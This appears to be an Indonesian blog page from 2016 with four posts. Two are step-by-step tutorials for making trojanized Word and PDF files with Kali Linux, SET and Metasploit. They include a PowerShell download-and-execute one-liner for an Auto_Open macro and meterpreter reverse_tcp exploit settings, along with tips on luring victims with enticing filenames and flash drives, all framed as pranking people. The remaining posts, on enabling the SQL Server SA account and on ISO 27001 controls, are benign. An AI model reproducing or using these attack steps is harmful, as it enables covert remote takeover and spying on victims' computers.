Wednesday, 14 December 2016

Bagaimana membuat Trojan pada File Word

Haiii gaaaeeesss...
Dari artikel sebelumnya, kita tau apa itu Trojan dan Backdoors, dan bagaimana membuatnya pada pdf file. Nah di artikel ini, yang akan dibahas adalah bagaimana membuat trojan pada file Word atau pada doc file. Hal-hal penting yang diperlukan adalah :
1. Kali Linux 1.09a (dijalankan secara virtual pada Virtualbox)
2. Microsoft Word
3. Jaringan internet (Pastikan target dalam satu jaringan)
4. Metasploit Framework
5. Obfuscate.jar (program tambahan untuk membuat file terinfeksi trojan)

Obfuscate disini berguna untuk mengambil data dari server dan akan menyimpannya pada clipboard. Obfuscatre.jar disimpan pada sistem operasi yang sudah memiliki program Microsoft Word, agar mempermudah saat memindahkan trojan ke file yang sudah ada.

langsung mulai ke tahap awal :
1. Buka Application > KaliLinux  >  Explotation Tools > Social Engineering Toolkit > Setoolkit

2. Setelah jendela Terminal terbuka lalu pada menu kita pilih nomer 1 yaitu Social-Engineering Attacks

3. Pada menu selanjutnya pilih 10 yaitu Powershell Attack Vectors

4. Pada menu selanjutnya pilih 1 yaitu Powershell Alphanumeric Shellcode Injector. Lalu akan keluar tampilan untuk memasukkan IP Address dan port untuk payload listener (IP yang dimiliki).  Setelah kita masukkan IP address dan port kemudian  akan ada pilihan yes dan no : jika akan memulai listener  secara otomatis berarti kita memilih yes, jika akan memulai listener secara manual berarti kita memilih  no.

5. Lalu buka root untuk memindah file .txt yang sudah dibuat pada powershell dengan command tersebut. File dipindahkan atau diupload ke server. Kemudian service apache2 di start.

6. Aktifkan metasploit dengan command msfconsole.  Command-command dibawahnya untuk membuka koneksi bagi target yang telah membuka file trojan.

7. Buka aplikasi Obfuscate.jar untuk mengambil script yang sudah dibuat dan di upload pada server.

8. Masukkan link untuk mengambil script .  Sesuaikan IP dari Server yang dituju.

Dan berikut merupakan command yang dimasukkan pada Obfuscate.jar. Command yang digunakan :

powershell.exe "IEX ((new-object net.webclient).downloadstring(' '))"

Jangan lupa mengubah IP dengan IP dari pembuat trojan.

Setelah memasukkan Command dan mengubah IP, maka akan tampil script dari server dan akan otomatis tersimpan pada clipboard. Seperti gambar berikut:

9. Script akan dimasukkan pada macros yang ada di word yang telah disiapkan. Macros terdapat pada tab menu View.

10. Ketikkan Auto_Open pada textbox Macro Name. Lalu Pilih Document1 atau nama dokumen yang dibuat. Kemudian klik Create.

11. Lalu pada Macro windows yang terbuka, paste script yang sudah tercopy pada clipboard. Seperti berikut :

12. Simpan word yang sudah ada script macros, yang telah terinfeksi virus. Sampai tahap ini trojan telah jadi dan di embed pada word.

13. Sisipkan file word yang sudah terinfeksi pada desktop, agar mempermudah untuk dibuka.

14. Ketika Word sudah dibuka oleh target maka akan tampil pada Kali Linux IP dari target.

15. Kemudian kita dapat melihat data dari target dengan mengetik command sysinfo. Untuk mengetahui informasi dari sistem.

16. Jika IP sudah didapat, maka kita dapat melakukan remote desktop, atau screensoot dan lain-lain pada desktop target, dengan mengetahui segala command yang ada pada help command. Seperti screenshoot desktop target:

begitu kiranya yang mau coba2 ngerjain orang dengan virus trojan, hihihi... Tapi langkah-langkah tersebut berhasil jika semua keamanan target tidak aktif.

Friday, 21 October 2016

Metasploit Hacking Dengan Backdoor PDF

kali ini saya akan memberi kalian sedikit info tentang bagaimana cara hacking atau membuat trojan dengan menggunakan Framework yang terdapat pada Sistem Operasi Kali Linux. Nah disini saya menggunakan PDF sebagai Backdoor.

Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan sendiri merupakan keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan.

Nah tujuan belajar Metasploit Hacking dengan Backdoor PDF adalah agar kalian dapat memunculkan modul, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun penyusup sistem berada pada jarak jangkauan yang jauh tetapi dapat mengendalikan komputer target.

Metasploit menyerang dengan cara mengirimkan exploit yang berisi payload yang sudah ditentukan oleh penyusup sistem pada komputer target.

Exploit merupakan software yang berfungsi untuk memanfaatkan kelemahan pada software target(misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban.

Payload merupakan sebuah file executable milik penyusup yang akan di run pada komputer target dengan tujuan dapat mengendalikan komputer tersebut secara remote atau memasang backdoor, trojan, virus, worm, dan lain-lain.

yang perlu kalian siapkan adalah sebagai berikut:
-  Kali Linux 1.09a (disini saya menggukan Virtual untuk menjalankan Kali Linux 1.09a)
- Adobe Reader 9.0
- Jaringan Internet(pastikan Target dalam satu jaringan)
- Metasploit Framework: Exploit: windows/fileformat/adobe_pdf_embedded_exe dan exploit/multi/handler. Payload: windows/meterpreter/reverse_tcp

Langkah-langkahnya sebagai berikut:

1. Cek Konfigurasi Jaringan

2. Menyiapkan Console msf Metasploit
Ketikkan perintah msfconsole pada terminal dan tampilan metasploitnya seperti gambar dibawah ini. oya biasanya tampilan setiap menjalankan Metasploit akan berubah-ubah.

3. Modul Exploitasi.

- use windows/fileformat/adobe_pdf_embedded_exe: Tipe Exploit yang digunakan.
- set msfencode x86/shikata_ga_nai: Command untuk meng-encode payload dan keluarnya di/tmp/clickname.exe
- set payload windows/meterpreter/reverse_tcp:  Mengatur payload yang digunakan kesebuah target ketika shell sudah terpasang.
- set lhost: IP Attacker, isi sesuai dengan IP anda.
- set lport: Port listener, saya menggunakan port 445 karena selalu terbuka.
- set filename: Nama file Backdoor, menggunakan nama semenarik mungkin agar target penasaran dan membukanya.
- set infilename: Merupakan file asli PDFnya, dan harus dimasukkan sesuai dengan path atau lokasi dimana file itu berada.
- exploit: Perintah untuk menghasilkan file PDF(backdoor)

4. Mengirimkan File Backdoor yang telah dibuat.
Disini saya menggunakan flashdisk untuk menjebak target dengan cara seolah-olah mengirim file yang dibutuhkan.

5. Modul Exploitasi Lanjutan(handler/listerner)
Proses diatas merupakan perintah menjalankan multi/handler untuk memastikan target terkena jebakan yang telah kita buat.

6. Hasil menjalankan (handler/listerner)

Bingooo!!! Prosesnya cepat, pada komputer target akan muncul box command prompt dalam waktu sekitar 1 detik. Dan kalau sudah muncul console meterpreter selanjutnya terserah kalian mau diapakan. Oya selanjutnya ketik perintah help , didalamnya tersedia command untuk melakukan apa saja yang bisa digunakan pada Desktop siTarget.

Mungkin itu saja yang dapat saya informasikan semoga bermanfaat buat Kakak-kakak semua yang memeliliki kejahilan tinggi hehehe... Terma kasih.


Sunday, 2 October 2016

Cara Menambahkan SA(system admin) pada SQL Server

SQL Server merupakan sistem manajemen basis data relasional (RDBMS) dari Microsoft yang dirancang untuk aplikasi dengan arsitektur client server. Terdapat 2 authentication untuk security pada SQL Server yaitu :
- Windows Authentication mode (tanpa menggunakan password)
- SQL Server and Windows Authentication mode

Untuk mengaktifkan akun SA agar bisa membatasi penggunaan database, yuk ikuti langkah-langkah berikut:

1. Pastikan bahwa security yang digunakan adalah SQL Server and Windows Authentication mode
1.1. Klik properties pada username master yang sudah terkoneksi

1.2. Klik menu security pada tab disebelah kiri
1.3. lalu pastikan authenticationnya SQL Server and Windows Authentication mode

1.4. Lalu klik OK

2. Membuat akun sa
2.1. Klik plus(+) pada menu Security di tab Object Explorer untuk membuka folder pada menu security

2.2. Klik plus(+) pada submenu Login kemudian klik kanan pada sa pilih Properties

2.3. Masukkan password dan confirm password

2.4. Lalu pilih database apa saja yang boleh di buka atau dapat di akses. Untuk SA biasanya secara default akan menggunakan master.

 2.5. Jika sudah klik status pada tab select a page lalu pilih enabled pada login

2.6. lalu klik OK

3. Lalu restart SQL Server, kemudian coba cek dengan cara koneksi ulang pada SQL Server
3.1. Klik icon tersebut pada Object Explorer

3.2. Pastikan SQL Server Authentication yang terpilih pada kolom Authentication

3.3. Masukkan Username dan Password
3.4. Lalu klik Connect

Sekian, Silakan dicoba kakak-kakak. Jika ada kesulitan bisa tanya pada kolom comment dibawah yaa.. :D

Friday, 30 September 2016

ISMS(Information Security Management System)

A. Definisi ISMS (Information Security Management System)

        ISMS(Information Security Management System) merupakan istilah yang muncul terutama dari ISO/IEC 27001 yang merujuk pada sistem manajemen yang berhubungan dengan keamanan informasi. Konsep utama ISMS dalam suatu organisasi adalah untuk merancang, menerapkan, dan memelihara suatu rangkaian terpadu, proses dan system untuk secara efektif mengelola keamanan informasi dan menjamin kerahasiaan, integritas, serta ketersediaan aset-aset informasi dan meminimalkan resiko keamanan informasi.
        Standar ISMS yang paling terkenal adalah ISO/IEC 27001 dan ISO/IEC 27002 serta standar yang terkait diterbitkan bersama oleh ISO dan IEC.
       ISO/IEC 27001:2005 adalah suatu standar Sistem Managemen Keamanan Informasi(ISMS) yang diterbitkan oleh ISO dan IEC pada Oktober 2005. Standar yang berasal dari BS 7799-2 ini ditujukan untuk digunakan bersama dengan 27002, yang memberikan daftar tujuan pengendalian keamanan dan merekomendasikan ISMS sesuai dengan pedoman praktik terbaik (best practices) pada ISO/IEC 27002 kemungkinan juga akan memenuhi persyaratan pada ISO/IEC 27001 walaupun sertifikasinya tetap opsional dan terlepas satu sama lain, kecuali jika diminta oleh para pemangku kepentingan organisasi.
        Terdapat perbedaan atau perubahan pada ISO 27001:2005 dengan ISO 27001:2013 sebagai berikut:
  •  ISO 27001:2005 memiliki 133 kendali (kontrol) dalam 11 kelompok domain.
  •  ISO 27001:2013 memiliki 114 kendali (kontrol) dalam 14 kelompok domain.
Adanya perubahan beberapa control pada ISO 27001:2013 ini adalah salah satu dampak dari adanya perubahan/perkembangan teknologi.

B. Manfaat Utama ISO 27001
  • ISO 27001 dapat bertindak sebagai perpanjangan dari sistem kualitas pada saat ini untuk memasukkan keamanan.
  • ISO 27001 memberikan kesempatan untuk mengidentifikasi dan mengelola resiko untuk informasi kunci dan aset sistem
  • Menyediakan kepercayaan diri dan jaminan kepada mitra dagang dan klien, bertindak sebagai alat pemasaran
  • Memungkinkan tinjauan independen dan jaminan kepada anda tentang praktek-praktek keamanan informasi
C. ISMS Control Requirement

         Pada bagian ini menjelaskan tentang 11 domain, 39 kontrol objectif dan 133 kontrol dari ISO/IEC 27001:2005.

A.5  Kebijakan Kemanan
A.5.1 Informasi Kebijakan Keamanan
Objektif : untuk memberikan arahan manajemen dan dukungan untuk keamanan informasi sesuai dengan kebutuhan bisnis dan hukum serta peraturan yang relevan
Review of the information security policy security
The information security policy shall be reviewed at planned intervals or if significant changes occur to ensure its continuing suitability, adequacy, and effectiveness.
A.6   Organisasi Kemanan Informasi
A.6.1 Organisasi Internal
Objektif : untuk mengelola keamanan informasi dalam sebuah organisasi
Management commitment to information security
Management shall actively support security within the organization through clear direction, demonstrated commitment, explicit assignment, and acknowledgment of information security responsibilities.
Information security coordination
Information security activities shall be co-ordinated by representatives from different parts of the organization with relevant roles and job functions.
Allocation of information security responsibilities
All information security responsibilities shall be clearly defined.
Authorization process for information processing facilities
A management authorization process for new information processing facilities shall be defined and implemented.
Confidentiality agreements
Requirements for confidentiality or non-disclosure agreements reflecting the organization’s needs for the protection of information shall be identified and regularly reviewed.
Independent review of information security
The organization’s approach to managing information security and its implementation (i.e. control objectives, controls, policies, processes, and procedures for information security) shall be reviewed independently at planned intervals, or when significant changes to the security implementation occur.
A.6.2 Pihak Eksternal
Objektif : untuk menjaga keamanan informasi dan pengolahan informasi fasilitas organisasi yang diakses, diolah, dikomunikasikan kepada, atau dikelola oleh pihak eksternal
Identification of risks related to external parties
The risks to the organization’s information and information processing facilities from business processes involving external parties shall be identified and appropriate controls implemented before granting access.
Addressing security when dealing with customers
All identified security requirements shall be addressed before giving customers access to the organization’s information or assets. 

Addressing security in third party agreements
Agreements with third parties involving accessing, processing, communicating or managing the organization’s information or information processing facilities, or adding products or services to information processing facilities shall cover all relevant security requirements.
A.7  Manajemen Aset
A.7.1  Tanggung Jawab untuk Aset
Objektif : untuk mencapai dan mempertahankan perlindungan yang tepat dari aset organisasi.
Inventory of assets
All assets shall be clearly identified and an inventory of all important assets drawn up and maintained.
Ownership of assets
All information and assets associated with information processing facilities shall be ‘owned’ by a designated part of the organization.
Acceptable use of assets
 Rules for the acceptable use of information and assets associated with information processing facilities shall be identified, documented, and implemented.

A.7.2  Klasifikasi Informasi
Objektif : Untuk memastikan informasi yang menerima tingkat perlindungan
Classification guidelines
Information shall be classified in terms of its value, legal requirements, sensitivity and criticality to the organization.
Information labelling and handling
An appropriate set of procedures for information labeling and handling shall be developed and implemented in accordance with the classification scheme adopted by the organization.

A.8   Keamanan Sumber Daya Manusia
A.8.1 Sebelum Kerja
Objektif : untuk memastikan bahwa karyawan, kontraktor dan pengguna pihak ketiga memahami tanggung jawab mereka, dan sesuai untuk peran mereka dan untuk mengurangi risiko pencurian, penipuan atau penyalahgunaan fasilitas.
Roles and responsibilities
Security roles and responsibilities of employees, contractors and third party users shall be defined and documented in accordance with the organization’s information security policy.
Background verification checks on all candidates for employment, contractors, and third party users shall be carried out in accordance with relevant laws, regulations and ethics, and proportional to the business requirements, the classification of the information to be accessed, and the perceived risks.
Accep Terms and conditions of employment
As part of their contractual obligation, employees, contractors and third party users shall agree and sign the terms and conditions of their employment contract, which shall state their and the organization’s responsibilities for information security.
A.8.2 Selama Kerja
Objektif : untuk memastikan bahwa semua karyawan, kontraktor dan pengguna pihak ketiga menyadari ancaman keamanan informasi dan kekhawatiran, tanggung jawab dan kewajiban mereka, dan dilengkapi untuk mendukung kebijakan keamanan organisasi dalam program kerja normal mereka, dan untuk mengurangi risiko kesalahan yang disebabkan oleh pengguna
Management responsibilities
Management shall require employees, contractors and third party users to apply security in accordance with established policies and procedures of the organization.
Information security awareness, education and training
All employees of the organization and, where relevant, contractors and third party users shall receive appropriate awareness training and regular updates in organizational policies and procedures, as relevant for their job function.
Disciplinary process
There shall be a formal disciplinary process for employees who have committed a security breach.
A.8.3 Penghentian atau Perubahan Tujuan
Objektif : untuk memastikan bahwa karyawan, kontraktor dan pengguna pihak ketiga keluar organisasi atau mengubah pekerjaan secara tertib.
Termination responsibilities
Responsibilities for performing employment termination or changeof employment shall be clearly defined and assigned.
Return of assets
All employees, contractors and third party users shall return all of the organization’s assets in their possession upon termination of their employment, contract or agreement.
Removal of access rights
The access rights of all employees, contractors and third party users to information and information processing facilities shall be removed upon termination of their employment, contract or agreement, or adjusted upon change.
A.9   Keamanan Fisik dan Lingkungan
A.9.1 Daerah Aman
Objektif : untuk mencegah akses yang tidak sah secara fisik, kerusakan dan gangguan untuk tempat dan infromasi organisasi
Physical security perimeter
Security perimeters (barriers such as walls, card controlled entry gates or manned reception desks) shall be used to protect areas that contain information and information processing facilities.

Physical entry controls
Secure areas shall be protected by appropriate entry controls to ensure that only authorized personnel are allowed access.
Securing offices, rooms and facilities
Physical security for offices, rooms, and facilities shall be designed and applied.
Protecting against external and environmental threats
Physical protection against damage from fire, flood, earthquake, explosion, civil unrest, and other forms of natural or man-made disaster shall be designed and applied.
Working in secure areas
Physical protection and guidelines for working in secure areas shall be designed and applied.

Public access, delivery and loading areas
Access points such as delivery and loading areas and other points where unauthorized persons may enter the premises shall be controlled and, if possible, isolated from information processing facilities to avoid unauthorized access.
A.9.2 Peralatan Keamanan
Objektif : untuk mencegah kehilangan, kerusakan, pencurian atau kompromi aset dan gangguan untuk kegiatan organisasi
Equipment siting and protection
Equipment shall be sited or protected to reduce the risks from environmental threats and hazards, and opportunities for unauthorized access.
Supporting utilities
Equipment shall be protected from power failures and other disruptions caused by failures in supporting utilities
Cabling security
Power and telecommunications cabling carrying data or supporting information services shall be protected from interception or damage.
Equipment maintenance
Equipment shall be correctly maintained to ensure its continued availability and integrity.
Security of equipment off premises
Security shall be applied to off-site equipment taking into account the different risks of working outside the organization’s premises.
Secure disposal or re-use of equipment
All items of equipment containing storage media shall be checked to ensure that any sensitive data and licensed software has been removed or securely overwritten prior to disposal.
Removal of property
Equipment, information or software shall not be taken off-site without prior authorization.
A.10   Komunikasi dan Manajemen Operasi
A.10.1 Prosedur Operasional dan responsibilitas
Objektif : untuk memastikan operasi yang benar dan aman dari fasilitas pengolahan informasi.
Documented operating procedures
Operating procedures shall be documented, maintained, and made available to all users who need them
Change management
Changes to information processing facilities and systems shall be controlled.
Segregation of duties
Duties and areas of responsibility shall be segregated to reduce opportunities for unauthorized or unintentional modification or misuse of the organization’s assets.
Separation of development, test and operational facilities
Development, test and operational facilities shall be separated to reduce the risks of unauthorised access or changes to the operational system.
A.10.2 Ketiga Layanan Pihak Manajemen
Objektif : Untuk menerapkan dan memelihara tingkat yang tepat dari keamanan informasi dan pelayanan sesuai dengan perjanjian pelayanan pihak ketiga.
Service delivery
It shall be ensured that the security controls, service definitions and delivery levels included in the third party service delivery agreement are implemented, operated, and maintained by the third party.

Monitoring and review of third party services
The services, reports and records provided by the third party shall be regularly monitored and reviewed, and audits shall be carried out regularly.
Managing changes to third party services
Changes to the provision of services, including maintaining and improving existing information security policies, procedures and controls, shall be managed, taking account of the criticality of business systems and processes involved and re-assessment of risks.
A.10.3 Sistem Perencanaan dan Penerimaan
Objektif : untuk meminimalkan risiko kegagalan sistem.
Capacity management
The use of resources shall be monitored, tuned, and projections made of future capacity requirements to ensure the required system performance.
System acceptance
Acceptance criteria for new information systems, upgrades, and new versions shall be established and suitable tests of the system(s) carried out during development and prior to acceptance.

A.10.4 Perlindungan Terhadap Kode Berbahaya dan Seluler
Objektif : untuk melindungi integritas dari perangkat lunak dan informasi
Controls against malicious code
Detection, prevention, and recovery controls to protect against malicious code and appropriate user awareness procedures shall be implemented.
Controls against mobile code
Where the use of mobile code is authorized, the configuration shall ensure that the authorized mobile code operates according to a clearly defined security policy, and unauthorized mobile code shall be prevented from executing.
A.10.5 Back-up
Objektif : untuk menjaga integritas dan ketersediaan fasilitas pengolahan informasi dan informasi.
Information back-up
Back-up copies of information and software shall be taken and tested regularly in accordance with the agreed backup policy.
A.10.6 Manajemen Keamanan Jaringan
Objektif : Untuk memastikan perlindungan informasi dalam jaringan dan perlindungan infrastruktur pendukung
Network controls
Networks shall be adequately managed and controlled, in order to be protected from threats, and to maintain security for the systems and applications using the network, including information in transit.
Security of network services
Security features, service levels, and management requirements of all network services shall be identified and included in any network services agreement, whether these services are provided in-house or outsourced.
A.10.7 Penanganan Media
Objektif : untuk mencegah keterbukaan informasi yang tidak sah, modifikasi, penghapusan atau perusakan aset, dan gangguan untuk kegiatan bisnis.
Management of removable media
There shall be procedures in place for the management of removable media. 

Disposal of media
Media shall be disposed of securely and safely when no longer required, using formal procedures
Information handling procedures
Procedures for the handling and storage of information shall be established to protect this information from unauthorized disclosure or misuse.
Security of system documentation
System documentation shall be protected against unauthorized access.
A.10.8 Pertukaran Informasi
Objektif : untuk menjaga keamanan informasi dan perangkat lunak yang dipertukarkan dalam suatu organisasi dan dengan entitas eksternal
Information exchange policies and procedures
Formal exchange policies, procedures, and controls shall be in place to protect the exchange of information through the use of all types of communication facilities.
Exchange agreements
Agreements shall be established for the exchange of information and software between the organization and external parties.
Physical media in transit
Media containing information shall be protected against unauthorized access, misuse or corruption during transportation beyond an organization’s physical boundaries.
Electronic messaging
 Information involved in electronic messaging shall be appropriately protected.
Business information systems
Policies and procedures shall be developed and implemented to protect information associated with the interconnection of business information systems.

A.10.9 Jasa Perdagangan Elektronik
Objektif : untuk memastikan keamanan layanan elektronik commerce, dan penggunaan yang aman bagi mereka.

Electronic commerce
Information involved in electronic commerce passing over public networks shall be protected from fraudulent activity, contract dispute, and unauthorized disclosure and modification.
On-line transactions
Information involved in on-line transactions shall be protected to prevent incomplete transmission, mis-routing, unauthorized message alteration, unauthorized disclosure, unauthorized message duplication or replay.
Publicly available information
The integrity of information being made available on a publicly available system shall be protected to prevent unauthorized modification.
A.10.10 Pemantauan
Objektif : untuk mendeteksi kegiatan pengolahan informasi yang tidak sah.
Audit logging
Audit logs recording user activities, exceptions, and information security events shall be produced and kept for an agreed period to assist in future investigations and access control monitoring.

Monitoring system use
Procedures for monitoring use of information processing facilities shall be established and the results of the monitoring activities reviewed regularly.
Protection of log information
Logging facilities and log information shall be protected against tampering and unauthorized access.
Administrator and operator logs
System administrator and system operator activities shall be logged.
Fault logging
Faults shall be logged, analyzed, and appropriate action taken.
Clock synchronization
The clocks of all relevant information processing systems within an organization or security domain shall be synchronized with an agreed accurate time source.
A.11 Kontrol Akses
A.11.1 Kebutuhan Bisnis untuk Kontrol Akses
Objektif : untuk mengontrol akses ke informasi
Access control policy
An access control policy shall be established, documented, and reviewed based on business and security requirements for access.
A.11.2 Manajemen akses pengguna
Objektif : untuk memastikan akses pengguna yang berwenang dan untuk mencegah akses tidak sah ke sistem informasi.
User registration
There shall be a formal user registration and de-registration procedure in place for granting and revoking access to all information systems and services.
Privilege management
The allocation and use of privileges shall be restricted and controlled.
User password management
The allocation of passwords shall be controlled through a formal management process.
Review of user access rights
Management shall review users’ access rights at regular intervals using a formal process.
A.11.3 Tanggungjawab Pengguna
Objektif : untuk mencegah akses yang tidak sah pengguna, dan kompromi atau pencurian fasilitas pengolahan informasi dan informasi.
Password use
Users shall be required to follow good security practices in the selection and use of passwords.

Unattended user equipment
Users shall ensure that unattended equipment has appropriate protection.
Clear desk and clear screen policy
A clear desk policy for papers and removable storage media and a clear screen policy for information processing facilities shall be adopted.
A.11.4 Jaringan Akses Kontrol
Objektif : untuk mencegah akses tidak sah ke layanan jaringan.
Policy on use of network services
Users shall only be provided with access to the services that they have been specifically authorized to use.
User authentication for external connections
 Appropriate authentication methods shall be used to control access by remote users.
Equipment identification in networks
Automatic equipment identification shall be considered as a means to authenticate connections from specific locations and equipment.
Remote diagnostic and configuration port protection
Physical and logical access to diagnostic and configuration ports shall be controlled.
Segregation in networks
Groups of information services, users, and information systems shall be segregated on networks.
Network connection control
For shared networks, especially those extending across the organization’s boundaries, the capability of users to connect to the network shall be restricted, in line with the access control policy and requirements of the business applications (see 11.1).

Network routing control
Routing controls shall be implemented for networks to ensure that computer connections and information flows do not breach the access control policy of the business applications.
A.11.5 Operasi Sistem Kontrol
Objektif : untuk mencegah akses tidak sah ke sistem operasi.
Secure log-on procedures
Access to operating systems shall be controlled by a secure log-on procedure.
User identification and authentication
All users shall have a unique identifier (user ID) for their personal use only, and a suitable authentication technique shall be chosen to substantiate the claimed identity of a user.

Password management system
Systems for managing passwords shall be interactive and shall ensure quality passwords.
Use of system utilities
The use of utility programs that might be capable of overriding system and application controls shall be restricted and tightly controlled.
Session time-out
Inactive sessions shall shut down after a defined period of inactivity.
Limitation of connection time
Restrictions on connection times shall be used to provide additional security for high-risk applications.
A.11.6 Aplikasi dan Informasi Kontrol Akses
Objektif : untuk mencegah akses tidak sah ke informasi yang dimiliki dalam sistem aplikasi.
Information access restriction
Access to information and application system functions by users and support personnel shall be restricted in accordance with the defined access control policy.

Sensitive system isolation
Sensitive systems shall have a dedicated (isolated) computing environment.
A.11.7 Komputasi dan Teleworking Ponsel
Objektif : untuk memastikan keamanan informasi ketika menggunakan komputasi dan teleworking fasilitas mobile.
Mobile computing and communications
A formal policy shall be in place, and appropriate security measures shall be adopted to protect against the risks of using mobile computing and communication facilities.
A policy, operational plans and procedures shall be developed and implemented for teleworking activities.
A.12    Sistem informasi akuisisi, pengembangan dan pemeliharaan
A.12.1  Persyaratan keamanan sistem informasi
Objektif : untuk memastikan keamanan yang merupakan bagian integral dari sistem informasi.
Security requirements analysis and specification
 Statements of business requirements for new information systems, or enhancements to existing information systems shall specify the requirements for security controls.
A.12.2 Pengolahan yang benar dalam aplikasi
Objektif : untuk mencegah kesalahan, kehilangan, modifikasi yang tidak sah atau penyalahgunaan informasi dalam aplikasi.
Input data validation
Data input to applications shall be validated to ensure that this data is correct and appropriate.

Control of internal processing
Validation checks shall be incorporated into applications to detect any corruption of information through processing errors or deliberate acts.
Message integrity
Requirements for ensuring authenticity and protecting message integrity in applications shall be identified, and appropriate controls identified and implemented.
Output data validation
Data output from an application shall be validated to ensure that the processing of stored information is correct and appropriate to the circumstances.
A.12.3 Kontrol kriptografi
Objektif : untuk melindungi kerahasiaan, keaslian atau integritas informasi dengan cara kriptografi.
Policy on the use of cryptographic controls
A policy on the use of cryptographic controls for protection of information shall be developed and implemented.
Key management
Key management shall be in place to support the organization’s use of cryptographic techniques.
A.12.4 Keamanan file sistem
Objektif : untuk memastikan keamanan file sistem.
Control of operational software
There shall be procedures in place to control the installation of software on operational systems.
Protection of system test data
 Test data shall be selected carefully, and protected and controlled.

Access control to program source code
Access to program source code shall be restricted.

A.12.5 Keamanan dalam proses pengembangan dan dukungan
Objektif : untuk menjaga keamanan perangkat lunak sistem aplikasi dan informasi.

Change control procedures
The implementation of changes shall be controlled by the use of formal change control procedures.
Technical review of applications after operating system changes
When operating systems are changed, business critical applications shall be reviewed and tested to ensure there is no adverse impact on organizational operations or security.
Restrictions on changes to software packages
Modifications to software packages shall be discouraged, limited to necessary changes, and all changes shall be strictly controlled.
Information leakage
Opportunities for information leakage shall be prevented.
Outsourced software development
Outsourced software development shall be supervised and monitored by the organization.
A.12.6 Manajemen Kerentanan teknis
Objektif : untuk mengurangi risiko akibat eksploitasi kerentanan teknis yang  diterbitkan.
Control of technical vulnerabilities
Timely information about technical vulnerabilities of information systems being used shall be obtained, the organization's exposure to such vulnerabilities evaluated, and appropriate measures taken to address the associated risk.
A.13 Pengelolaan Insiden Kemanan Informasi
A.13.1 Pelaporan kejadian keamanan informasi dan kelemahan
Objektif : untuk memastikan kejadian keamanan informasi dan kelemahan yang terkait dengan sistem informasi dikomunikasikan dengan cara yang memungkinkan tindakan korektif tepat waktu yang akan diambil.
Reporting information security events
Information security events shall be reported through appropriate management channels as quickly as possible.
Reporting security weaknesses
All employees, contractors and third party users of information systems and services shall be required to note and report any observed or suspected security weaknesses in systems or services.
A.13.2 Manajemen insiden keamanan informasi dan perbaikan
Objektif : untuk memastikan pendekatan yang konsisten dan efektif yang diterapkan pada pengelolaan insiden keamanan informasi.
Responsibilities and procedures
Management responsibilities and procedures shall be established to ensure a quick, effective, and orderly response to information security incidents.
Learning from information security incidents
 There shall be mechanisms in place to enable the types, volumes, and costs of information security incidents to be quantified and monitored.
Collection of evidence
 Where a follow-up action against a person or organization after an information security incident involves legal action (either civil or criminal), evidence shall be collected, retained, and presented to conform to the rules for evidence laid down in the relevant jurisdiction(s).
A.14 Manajemen Kelangsungan Bisnis
A.14.1 Aspek keamanan informasi manajemen kelangsungan bisnis
Objektif : untuk mengatasi gangguan untuk kegiatan bisnis dan untuk melindungi proses bisnis kritis dari efek kegagalan utama dari sistem informasi atau bencana dan untuk memastikan dimulainya dengan tepat waktu
Including information security in the business continuity management process
A managed process shall be developed and maintained for business continuity throughout the organization that addresses the information security requirements needed for the organization’s business continuity.
Business continuity and risk assessment
Events that can cause interruptions to business processes shall be identified, along with the probability and impact of such interruptions and their consequences for information security.
Developing and implementing continuity plans including information security
Plans shall be developed and implemented to maintain or restore operations and ensure availability of information at the required level and in the required time scales following interruption to, or failure of, critical business processes.
Business continuity planning framework
 A single framework of business continuity plans shall be maintained to ensure all plans are consistent, to consistently address information security requirements, and to identify priorities for testing and maintenance.
Testing, maintaining and reassessing business continuity plans
Business continuity plans shall be tested and updated regularly to ensure that they are up to date and effective
A.15 Kepatuhan
A.15.1 Kepatuhan dengan persyaratan hukum
Objektif : untuk menghindari pelanggaran hukum, kewajiban hukum, peraturan atau kontrak, dan persyaratan keamanan
Identification of applicable legislation
All relevant statutory, regulatory and contractual requirements and the organization’s approach to meet these requirements shall be explicitly defined, documented, and kept up to date for each information system and the organization.
Intellectual property rights (IPR)
Appropriate procedures shall be implemented to ensure compliance with legislative, regulatory, and contractual requirements on the use of material in respect of which there may be intellectual property rights and on the use of proprietary software products.
Protection of organizational records
Important records shall be protected from loss, destruction and falsification, in accordance with statutory, regulatory, contractual, and business requirements.
Data protection and privacy of personal information
Data protection and privacy shall be ensured as required in relevant legislation, regulations, and, if applicable, contractual clauses.
Prevention of misuse of information processing facilities
Users shall be deterred from using information processing facilities for unauthorized purposes.

Regulation of cryptographic controls
Cryptographic controls shall be used in compliance with all relevant agreements, laws, and regulations
A.15.2 Sesuai dengan kebijakan keamanan dan standar, dan kepatuhan teknis
Objektif : untuk memastikan kepatuhan sistem dengan kebijakan dan standar keamanan organisasi.
Compliance with security policies and standards
Managers shall ensure that all security procedures within their area of responsibility are carried out correctly to achieve compliance with security policies and standards.
Technical compliance checking
Information systems shall be regularly checked for compliance with security implementation standards.
A.15.3 Informasi pertimbangan sistem audit
Objektif : Untuk memaksimalkan efektivitas dan untuk meminimalkan gangguan ke / dari proses audit sistem informasi.
Information systems audit controls
Audit requirements and activities involving checks on operational systems shall be carefully planned and agreed to minimize the risk of disruptions to business processes.
Protection of information systems audit tools
Access to information systems audit tools shall be protected to prevent any possible misuse or compromise.
